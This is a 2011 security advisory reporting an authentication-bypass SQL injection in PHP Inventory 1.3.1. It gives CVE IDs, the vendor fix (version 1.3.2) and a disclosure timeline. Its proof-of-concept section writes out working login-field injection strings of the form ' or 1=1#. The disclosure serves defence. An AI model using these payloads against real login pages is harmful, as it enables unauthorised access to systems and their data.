INFOSERVE-ADV2011-08 - PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory:
|
PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
|
Advisory ID:
|
INFOSERVE-ADV2011-08
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on PHP Inventory 1.3.1
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
CVE-2009-4595,CVE-2009-4596,CVE-2009-4597
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
PHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability
==============
PoC-Exploit
==============
PoC-Exploit
==============
// with ‘magic_quotes_gpc = Off’
USER NAME = ‘ or 1=1#
or
USER NAME = admin
PASSWORD = ‘ or 1=1#
PASSWORD = ‘ or 1=1#
=====
Solution
=====
Solution
=====
Update to the latest version 1.3.2
================
Disclosure Timeline
================
Disclosure Timeline
================
29-Nov-2011 – informed vendor (contact form)
30-Nov-2011 – vendor fix
30-Nov-2011 – vendor fix
====
Credits
====
Credits
====
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
=======
References
=======
References
=======
Comments
Display comments as Linear | Threaded